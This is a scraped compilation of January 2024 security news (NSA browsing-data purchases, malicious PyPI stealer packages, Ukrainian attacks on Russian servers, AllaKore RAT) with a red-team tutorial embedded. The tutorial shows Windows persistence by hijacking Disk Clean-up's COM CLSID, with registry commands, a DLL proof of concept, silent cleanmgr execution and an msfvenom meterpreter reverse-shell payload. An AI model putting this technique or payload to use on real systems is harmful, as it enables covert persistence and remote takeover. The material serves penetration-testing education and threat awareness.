A list of topics we covered in the week of January 22 to January 28 of 2024

January 25, 2024 - Chinese speaking users looking for Telegram, or LINE are being targeted with malicious ads. Instead of downloading the legitimate application, they install malware.

January 25, 2024 - ThreatDown has earned 37/37 awards over nine consecutive quarters.

January 24, 2024 - 2023 was the worst ransomware year on record for Education.

January 24, 2024 - Your smart devices may reveal information about you or your location to an ex-partner. Here's how to lock them out.

January 24, 2024 - Apple has released new security updates for several products including a patch for a zero-day vulnerability which may have been exploited.

 A week in security (January 22 &#8211; January 28) 

The U.S. National Security Agency (NSA) has admitted to buying internet browsing records from data brokers to identify the websites and apps Americans use that would otherwise require a court order, U.S. Senator Ron Wyden said last week.
"The U.S. government should not be funding and legitimizing a shady industry whose flagrant violations of Americans' privacy are not just unethical, but illegal

Surveillance / Data Privacy

The U.S. National Security Agency (NSA) has admitted to buying internet browsing records from data brokers to identify the websites and apps Americans use that would otherwise require a court order, U.S. Senator Ron Wyden said last week.

"The U.S. government should not be funding and legitimizing a shady industry whose flagrant violations of Americans' privacy are not just unethical, but illegal," Wyden said in a letter to the Director of National Intelligence (DNI), Avril Haines, in addition to taking steps to "ensure that U.S. intelligence agencies only purchase data on Americans that has been obtained in a lawful manner."

Metadata about users' browsing habits can pose a serious privacy risk, as the information could be used to glean personal details about an individual based on the websites they frequent.

This could include websites that offer resources related to mental health, assistance for survivors of sexual assault or domestic abuse, and telehealth providers who focus on birth control or abortion medication.

In response to Wyden's queries, the NSA said it has developed compliance regimes and that it "takes steps to minimize the collection of U.S. person information" and "continues to acquire only the most useful data relevant to mission requirements."

The agency, however, said it does not buy and use location data collected from phones used in the U.S. without a court order. It also said it does not use location information obtained from automobile telematics systems from vehicles located in the country.

Ronald S. Moultrie, under secretary of defense for intelligence and security (USDI&S), said Departments of Defense (DoD) components acquire and use commercially available information (CAI) in a manner that "adheres to high standards of privacy and civil liberties protections" in support of lawful intelligence or cybersecurity missions.

The revelation is yet another indication that intelligence and law enforcement agencies are purchasing potentially sensitive data from companies that would necessitate a court order to acquire directly from communication companies. In early 2021, it was revealed the Defense Intelligence Agency (DIA) was buying and using domestic location data collected from smartphones via commercial data brokers.

The disclosure about warrantless purchase of personal data arrives in the aftermath of the Federal Trade Commission (FTC) prohibiting Outlogic (formerly X-Mode Social) and InMarket Media from selling precise location information to its customers without users' informed consent.

Outlogic, as part of its settlement with the FTC, has also been barred from collecting location data that could be used to track people's visits to sensitive locations such as medical and reproductive health clinics, domestic abuse shelters, and places of religious worship.

The purchase of sensitive data from these "shady companies" has existed in a legal gray area, Wyden noted, adding the data brokers that buy and resell this data are not known to consumers, who are often kept in the dark about who their data is being shared with or where it is being used.

Another notable aspect of these shadowy data practices is that third-party apps incorporating software development kits (SDKs) from these data brokers and ad-tech vendors do not notify users of the sale and sharing of location data, whether it be for advertising or national security.

"According to the FTC, it is not enough for a consumer to consent to an app or website collecting such data, the consumer must be told and agree to their data being sold to 'government contractors for national security purposes,'" the Oregon Democrat said.

"I am unaware of any company that provides such warnings to consumers before their data is collected. As such, the lawbreaking is likely industry-wide, and not limited to this particular data broker."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

NSA Admits Secretly Buying Your Internet Browsing Data without Warrants

Disk Clean-up is a utility which is part of Windows operating systems and can free up hard drive disk space by deleting mainly cache and… 
Continue reading → Persistence – Disk Clean-up

Disk Clean-up is a utility which is part of Windows operating systems and can free up hard drive disk space by deleting mainly cache and temporary files to improve system performance. The utility was introduced in Windows 98 operating systems and even though it has been deprecated and replaced with a modern version in the settings application, Microsoft has not removed it and has kept it as a legacy tool.

From the perspective of Red Teaming it is feasible to utilize the disk clean-up utility to establish persistence by executing arbitrary code when the utility is initiated. Specifically, this method relies on COM Hijacking since the _cleanmgr.exe_ which is the utility which initiates the Disk Clean-up will examine the Windows registry for a number of DLL’s. Therefore, hijacking one the CLSID’s which is associated with the Disk Clean-up will result in code execution.

Disk Clean-up

The _Files to delete_ functionality is retrieved from the registry and it is not static. If elevation of privileges has been achieved, then it is possible to create registry entries that will cause the _cleanmgr.exe_ utility execute an arbitrary DLL. The following registry keys are associated with the functionality of Disk Clean-up:

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\<registry-key-CLSID>HKCU\Software\Classes\CLSID\{arbitrary-CLSID}

Execution of the following command will enumerate the registry keys which are correlated with the _Files to delete_ functionality:

    reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /s

Persistence Disk Clean-up – VolumeCaches Registry Keys

From the registry keys listed, the _Downloaded Program Files_ is associated with the _{8369AB20-56C9-11D0-94E8-00AA0059CE02}_ CLSID.

Downloaded Program Files CLSID

Also, this indicated the presence of this CLSID under the following registry key:

    reg query "HKEY_CLASSES_ROOT\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s

Registry Query CLSID

The following code can be used as a proof of concept to display a message box when the disk clean-up utility is initiated.

#include "pch.h"
#include "windows.h"
#include "WinUser.h"



BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul\_reason\_for\_call,
                       LPVOID lpReserved
                     )
{
    switch (ul\_reason\_for\_call)
    {
    case DLL\_PROCESS\_ATTACH:
        MessageBox(NULL, (LPCWSTR)L"Visit pentestlab.blog",(LPCWSTR)L"pentestlab", MB\_OK);
        break;
    case DLL\_THREAD\_ATTACH:
        break;
    case DLL\_THREAD\_DETACH:
        break;
    case DLL\_PROCESS\_DETACH:
        break;
    }
    return TRUE;
}

Persistence Disk Clean-up – Visual Studio Message Box

The CLSID which is going to be hijacked needs to be created under the following registry key and the subkey of _InprocServer32_ under the hijacked CLSID which needs to target the path of the arbitrary DLL.

    HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID

Persistence Disk Cleanup – Cleanup DLL

Execution of the command below can enumerate the hijacked CLSID in order to verify that it points to the arbitrary DLL.

    reg query "HKCU\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s

Running the _cleanmgr.exe_ will execute the code. It should be noted that usage of the parameter _/autoclean_ will not display to the user the graphical user interface of the Disk Clean-up. Furthermore, it could be combined with other functionality of Windows such as registry run keys or scheduled tasks to execute this binary during start-up or at a specific time interval.

    cleanmgr.exe
    cleanmgr.exe /autoclean
    cleanmgr.exe /setup
    cleanmgr.exe /cleanup

Persistence Disk Clean-up – MessageBox

Metasploit Framework utility _msfvenom_ can be used to generated a DLL automatically. Even though this is not a safe method and could lead to a detection during a red team exercise it is used only for the purposes of the article.

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=4444 -f dll -o pentestlab.dll

Metasploit msfvenom

As previously the DLL needs to be written on the disk and the registry key must be modified to target the new path.

msfvenom – pentestlab DLL

Once the disk clean-up is started the code will be executed and a _meterpreter_ session will established with the compromised host.

Persistence Disk Clean-up – Metasploit

**References**

1.  https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html
2.  https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/

**Post navigation**

Persistence – Disk Clean-up

Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called WhiteSnake Stealer on Windows systems.
The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS."
"These

PyPI Repository / Malware

Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called **WhiteSnake Stealer** on Windows systems.

The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS."

"These packages incorporate Base64-encoded source code of PE or other Python scripts within their setup.py files," Fortinet FortiGuard Labs said in an analysis published last week.

"Depending on the victim devices' operating system, the final malicious payload is dropped and executed when these Python packages are installed."

While Windows systems are infected with WhiteSnake Stealer, compromised Linux hosts are served a Python script designed to harvest information. The activity, which predominantly targets Windows users, overlaps with a prior campaign that JFrog and Checkmarx disclosed last year.

"The Windows-specific payload was identified as a variant of the \[...\] WhiteSnake malware, which has an Anti-VM mechanism, communicates with a C&C server using the Tor protocol, and is capable of stealing information from the victim and executing commands," JFrog noted in April 2023.

It's also designed to capture data from web browsers, cryptocurrency wallets, and apps like WinSCP, CoreFTP, Windscribe, Filezilla, AzireVPN, Snowflake, Steam, Discord, Signal, and Telegram.

Checkmarx is tracking the threat actor behind the campaign under the moniker PYTA31, stating the end goal is to exfiltrate sensitive and particularly crypto wallet data from the target machines.

Some of the newly published rogue packages have also been observed incorporating clipper functionality to overwrite clipboard content with attacker-owned wallet addresses to carry out unauthorized transactions. A few others have been configured to steal data from browsers, applications, and crypto services.

Fortinet said the finding "demonstrates the ability of a single malware author to disseminate numerous info-stealing malware packages into the PyPI library over time, each featuring distinct payload intricacies."

The disclosure comes as ReversingLabs discovered two malicious packages on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines

By Deeba Ahmed
Ukraine Reports Multiple Cyberattacks on Critical Russian Government Infrastructure and Private Companies, Leading to Nationwide Disruption and Massive Data Loss.
This is a post from HackRead.com Read the original post: Ukraine Claims Destruction of 280 Russian Servers, 2 Petabytes Lost

Cybersecurity specialists from the Ukrainian HUR (Main Intelligence Directorate of the Ministry of Defense of Ukraine) have claimed a successful cyber attack on IPL Consulting. They reportedly destroyed its entire IT infrastructure, resulting in communication outages across the country.

For your information, IPL Consulting is a Russian company that implements information systems in the local industry. As per HUR’s announcement on Facebook, the company is among the most advanced of all Russian enterprises facilitating information system implementation services to institutions in the automotive, aviation, heavy engineering, and defense sectors. Ukrainian intelligence reports that HUR specialists targeted dozens of its servers and databases.

The Main Directorate of Intelligence of the Ministry of Defense of Ukraine on Facebook

IPL Consulting’s internal network was breached by hackers, resulting in the deletion of over 60 terabytes of data and the destruction of dozens of servers and databases. The full cost of damages remains unclear. According to HUR, the damage is particularly significant amidst ongoing sanctions pressure and affects numerous Russian companies operating in the defence sector.

Cyberattacks have become a common tool in the Russia-Ukraine war, with a devastating attack on telecom firm Kyivstar on December 12, 2023, resulting in widespread communication outages. The Russian hacker group Solntsepek, linked to Russia’s military intelligence agency, claimed responsibility for this attack. Ukrainian cyber specialists have also been quite aggressive on the digital front lately.

In a separate attack, a Ukrainian hacking group “Blackjack” infiltrated Russia’s Main Military Construction Directorate for Special Projects, downloading 1.2 TB of data, including technical documentation for over 500 military sites, confirmed HUR on its Telegram channel on January 19, 2024. The group also transmitted critical intelligence about Russian facilities to Ukrainian armed forces. The hackers temporarily disrupted the company’s operations. 

Another cyberattack was launched against the Russian Far Eastern Research Center of Space Hydrometeorology “Planeta” in Khabarovsk on January 24, 2024, resulting in the destruction of 280 servers and the loss of 2 petabytes (2 million gigabytes) of data, valued at least $10 million. This attack is attributed to Volunteer Patriots from the BO Team group. Planeta is responsible for receiving/processing military satellite data.

According to HUR’s claim, hackers also managed to destroy weather and satellite data for various Russian agencies, including the Russian Ministry of Emergency Affairs, the Ministry of Defense, and Roscosmos. HUR states that the over $350,000 supercomputer cannot be restored, and given the Western sanctions on Russia, the country cannot obtain this software.

Moreover, they disrupted air conditioning, humidification systems, and emergency power supply regulations. The HUR also stated that the attack disconnected a Russian station in the Arctic, affecting strategic companies vital to defence and supporting Russian occupation forces. 

The incident follows a previous incident in which the HUR collected 100 gigabytes of confidential, intelligence data valued at $1.5 billion, and belonging to Special Technology Center LLC, operating in Russia’s military-industrial complex.

****_RELATED ARTICLES_****

1.  **Ukraine’s Cyberattack Cripples Russia’s Tax System**
2.  **Ukrainian Hackers Trick Russian Military Wives for Personal Info**
3.  **UAC-0099 Using Old WinRAR Flaw in New Cyberattack on Ukraine**
4.  **Protestware Uses npm Packages to Call for Peace in Gaza, Ukraine**
5.  **Ukraine Hacks Russia’s Aviation Agency, Claims “Aviation Cannibalism”**

Ukraine Claims Destruction of 280 Russian Servers, 2 Petabytes Lost

By Deeba Ahmed
FortiGuard Labs’ latest research report reveals a concerning trend: threat actors are leveraging the Python Package Index (PyPI),…
This is a post from HackRead.com Read the original post: Crypto Stealing PyPI Malware Hits Both Windows and Linux Users

FortiGuard Labs’ latest research report reveals a concerning trend: threat actors are leveraging the Python Package Index (PyPI), an open repository for Python\-developed software packages, to upload malware-infected packages. This exploitation of PyPI’s infrastructure poses significant risks to users.

FortiGuard Labs team recently identified a PyPI malware author, “WS,” uploading malicious packages to PyPI, estimating over 2000 potential victims. The identified packages, including nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111, show attack methodologies that resemble the attacks identified by Checkmarx in 2023.

These packages contain base64-encoded Python scripts, which are executed depending on the victim’s operating system. The packages deploy Whitesnake PE malware on Windows devices or a Python script to steal information from Linux devices.

What’s interesting in this scheme is that Python scripts are using a new method to transmit stolen data, using a range of IP addresses as the destination instead of a single fixed URL. This helps ensure successful data transmission even when one server fails.

Recently identified packages primarily target Windows users, whereas previous ones targeted both Linux and Windows users. The objective is to exfiltrate sensitive information from victims.

The Whitesnake PE payload is a Python-compiled executable created using the PyInstaller tool, displaying an incomplete script file ‘main.pyc’ and another file ‘addresses.py.’ This is rather suspicious. ‘Main.pyc’ is clandestine code that copies itself to the Windows startup folder for autorun, probes logical drives, and monitors the count of running instances.

It also retrieves clipboard contents and compares them against predefined cryptocurrency address patterns, prompting it to overwrite the clipboard with corresponding addresses from ‘addresses.py’, potentially deceiving victims into directing cryptocurrency transactions to an unexpected destination.

The payload, an encrypted.NET executable launches an invisible window right after its installation and adds itself to Windows Defender‘s exclusion list. It then creates a scheduled task to run every hour on the compromised device. The task connects a malicious IP to a client using “socket.io” and collects sensitive user data, including IP address and host credentials.

The payload captures wallet and browser data and sends it to a suspicious IP address via a remote server as a.zip file with multiple encryption layers, which the attacker extracts and exfiltrates. Debugging revealed strings that indicated information stolen from a wide range of devices, such as cryptocurrency services, applications, and browsers.

Timeline of the malicious PyPI packages published by “WS” (Screenshot: Fortinet Labs)

The research reveals how easily a single malware author can distribute multiple info-stealing packages into the PyPI library, highlighting the need for vigilance when using open-source packages.

“Information-stealing malware is an increasingly pertinent and pressing subject. Safeguarding against such persistent adversaries demands a strategic and forward-thinking approach to fortify your defences,” FortiGuard Labs researchers concluded.

****_RELATED ARTICLES_****

1.  **Luna Grabber Malware Hits Roblox Devs Through npm Packages**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **GitHub Abused to Spread Malicious Packages on PyPI in Image Files**
4.  **NPM Typosquatting Attack Deploys r77 Rootkit via Legitimate Package**
5.  **FortiGuard Labs Uncovers Series of Malicious NPM Packages Stealing Data**

Crypto Stealing PyPI Malware Hits Both Windows and Linux Users

By Waqas
Soap2day: From Ashes to Pixels - The Curious Case of a Streaming Phoenix.
This is a post from HackRead.com Read the original post: New Soap2day Domains Emerge Despite Legal Challenges

Soap2day permanently shut down in June 2023 – While the official site and its major mirror sites closed down, it seems like some copycats or imitators have emerged using new domains to offer similar illegal streaming services.

Soap2day, the once-infamous haven for free movie and TV show streaming, met its apparent demise in June 2023. Legal pressure and a barrage of copyright infringement takedowns seemingly snuffed out the life of this unauthorized streaming giant. But just like a phoenix rising from the ashes, Soap2day has begun to flicker back to life under new guises, leaving users and authorities alike scratching their heads.

The original Soap2day was a hydra of sorts, with countless mirror sites popping up as fast as the old ones were shut down. This online game of whack-a-mole frustrated content creators and copyright holders for years. However, a coordinated takedown effort in mid-2023 seemed to deal a decisive blow, leaving behind a digital graveyard of dormant URLs.

This was the goodbye message from Soap2day (Screenshot credit: Hackread.com)

But death, it seems, can be temporary in the ever-evolving web. New domains bearing the Soap2day name have started surfacing, offering the same illicit library of movies and TV shows.

These digital doppelgangers appear disconnected from the original operators, possibly opportunistic copycats eager to fill the void left in the streaming underworld. Some of these new domains, like **Soap2day.rs**, **Soap2day.day**, and **Soap2day.store**, are easily accessible through Google. They offer access to thousands of recently released content for free.

The screenshot shows 2 of the new Soap2day domains currently online (Screenshot credit: Hackread.com)

However, there is no such thing as a free lunch. Online streaming services are infamous for phishing users or even dropping malware through pop-up bombardment. The risks are far greater than the potential benefits, making it not worth it. Therefore, engaging with these copycat sites exposes users to a plethora of dangers, including:

*   **Privacy violations:** Dodgy data practices are often rampant on such sites, putting your online privacy at risk.
*   **Malware and phishing attacks:** Disguised software installs and fraudulent links can lurk within these illegal platforms, jeopardizing your device and personal information.
*   **Legal repercussions:** Accessing copyrighted content illegally can lead to hefty fines and legal consequences in many countries.

So, why take the risk when a plethora of legal alternatives exist? Streaming platforms like Netflix, Hulu, and Disney+ offer vast libraries of content for a reasonable price. Additionally, numerous free, legal options like Tubi TV and Crackle provide access to movies and TV shows without compromising your security or wallet.

Here is a detailed list of legal and free online streaming services for movies and TV shows. Remember, using legal platforms not only ensures a safer and more reliable experience but also supports the entertainment industry and content creators.

The Soap2day saga highlights the ephemeral nature of illegal streaming sites. Their days are numbered, yet copycats will always appear, and the risks associated with them far outweigh the fleeting satisfaction of pirated content. Choose legal and safe alternatives, and enjoy your favourite shows and movies with peace of mind.

1.  **Streaming site 123movies has been shut down**
2.  **Fake streaming sites using Star Wars as bait to spread malware**
3.  **Poker player jailed for illegal video streaming, downloading sites**
4.  **Adult streaming site CAM4 leaks 7 TB of data with 11 billion records**
5.  **Police shut down illegal video streaming app Mobdro with 100M users**
6.  **US COVID-19 relief bill to make copyrighted content streaming a felony**

New Soap2day Domains Emerge Despite Legal Challenges

Plus: North Korean hackers get into generative AI, a phone surveillance tool that can monitor billions of devices gets exposed, and ambient light sensors pose a new privacy risk.

Police took a digital rendering of a suspect's face, generated using DNA evidence, and ran it through a facial recognition system in a troubling incident reported for the first time by WIRED this week. The tactic came to light in a trove of hacked police records published by the transparency collective Distributed Denial of Secrets. Meanwhile, information about United States intelligence agencies purchasing Americans' phone location data and internet metadata without a warrant was revealed this week only after US senator Ron Wyden blocked the appointment of a new NSA director until the information was made public. And a California teen who allegedly used the handle Torswats to carry out hundreds of swatting attacks across the US is being extradited to Florida to face felony charges.

The infamous spyware developer NSO Group, creator of the Pegasus spyware, has been quietly planning a comeback, which involves investing millions of dollars lobbying in Washington while exploiting the Israel-Hamas war to stoke global security fears and position its products as a necessity. Breaches of Microsoft and Hewlett-Packard Enterprise, disclosed in recent days, have pushed the espionage operations of the well-known Russia-backed hacking group Midnight Blizzard back into the spotlight. And Amazon-owned Ring said this week that it is shutting down a feature of its controversial Neighbors app that gave law enforcement a free pass to request footage from users without a warrant.

WIRED had a deep dive this week into the Israel-linked hacking group known as Predatory Sparrow and its notably aggressive offensive cyberattacks, particularly against Iranian targets, which have included crippling thousands of gas stations and setting a steel mill on fire. With so much going on, we've got the perfect quick weekend project for iOS users who want to feel more digitally secure: Make sure you've upgraded your iPhone to iOS 17.3 and then turn on Apple's new Stolen Device Protection feature, which could block thieves from taking over your accounts.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

After first disclosing a breach in October, the ancestry and genetics company 23andMe said in December that personal data from 6.9 million users was impacted in the incident stemming from attackers compromising roughly 14,000 user accounts. These accounts then gave attackers access to information voluntarily shared by users in a social feature the company calls DNA Relatives. 23andMe has blamed users for the account intrusions, saying that they only occurred because victims set weak or reused passwords on their accounts. But a state-mandated filing in California about the incident reveals that the attackers started compromising customers’ accounts in April and continued through much of September without the company ever detecting suspicious activity—and that someone was trying to guess and brute-force users' passwords.

North Korea has been using generative artificial intelligence tools “to search for hacking targets and search for technologies needed for hacking,” according to a senior official at South Korea's National Intelligence Service who spoke to reporters on Wednesday under the condition of anonymity. The official said that Pyongyang has not yet begun incorporating generative AI into active offensive hacking operations but that South Korean officials are monitoring the situation closely. More broadly, researchers say they are alarmed by North Korea's development and use of AI tools for multiple applications.

The digital ad industry is notorious for enabling the monitoring and tracking of users across the web. New findings from 404 Media highlight a particularly insidious service, Patternz, that draws data from ads in hundreds of thousands of popular, mainstream apps to reportedly fuel a global surveillance dragnet. The tool and its visibility have been marketed to governments around the world to integrate with other intelligence agency surveillance capabilities. “The pipeline involves smaller, obscure advertising firms and advertising industry giants like Google. In response to queries from 404 Media, Google and PubMatic, another ad firm, have already cut-off a company linked to the surveillance firm,” 404's Joseph Cox wrote.

Researchers from MIT’s Computer Science and Artificial Intelligence Laboratory have devised an algorithm that could be used to convert data from smart devices' ambient light sensors into an image of the scene in front of the device. A tool like this could be used to turn a smart home gadget or mobile device into a surveillance tool. Ambient light sensors measure light in an environment and automatically adjust a screen's brightness to make it more usable in different conditions. But because ambient light data isn't considered to be sensitive, these sensors automatically have certain permissions in an operating system and generally don't require specific approval from a user to be used by an app. As a result, the researchers point out that bad actors could potentially abuse the readings from these sensors without users having recourse to block the information stream.

23andMe Failed to Detect Account Intrusions for Months

Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT.
The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021.
"Lures use Mexican Social

Malware / Software Update

Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT.

The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021.

"Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process," the Canadian company said in an analysis published earlier this week.

"The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud."

The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, public sector, manufacturing, transportation, commercial services, capital goods, and banking sectors.

The infection chain begins with a ZIP file that's either distributed via phishing or a drive-by compromise, which contains an MSI installer file that drops a .NET downloader responsible for confirming the Mexican geolocation of the victim and retrieving the altered AllaKore RAT, a Delphi-based RAT first observed in 2015.

"AllaKore RAT, although somewhat basic, has the potent capability to keylog, screen capture, upload/download files, and even take remote control of the victim's machine," BlackBerry said.

The new functions added to the malware by the threat actor include support for commands related to banking fraud, targeting Mexican banks and crypto trading platforms, launching a reverse shell, extracting clipboard content, and fetching and executing additional payloads.

The threat actor's links to Latin America come from the use of Mexico Starlink IPs used in the campaign, as well as the addition of Spanish-language instructions to the modified RAT payload. Furthermore, the lures employed only work for companies that are large enough to report directly to the Mexican Social Security Institute (IMSS) department.

"This threat actor has been persistently targeting Mexican entities for the purposes of financial gain," the company said. "This activity has continued for over two years, and shows no signs of stopping."

The findings come as IOActive said it identified three vulnerabilities in the Lamassu Douro bitcoin ATMs (CVE-2024-0175, CVE-2024-0176, and CVE-2024-0177) that could allow an attacker with physical access to take full control of the devices and steal user assets.

The attacks are made possible by exploiting the ATM's software update mechanism and the device's ability to read QR codes to supply their own malicious file and trigger the execution of arbitrary code. The issues were fixed by the Swiss company in October 2023.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#git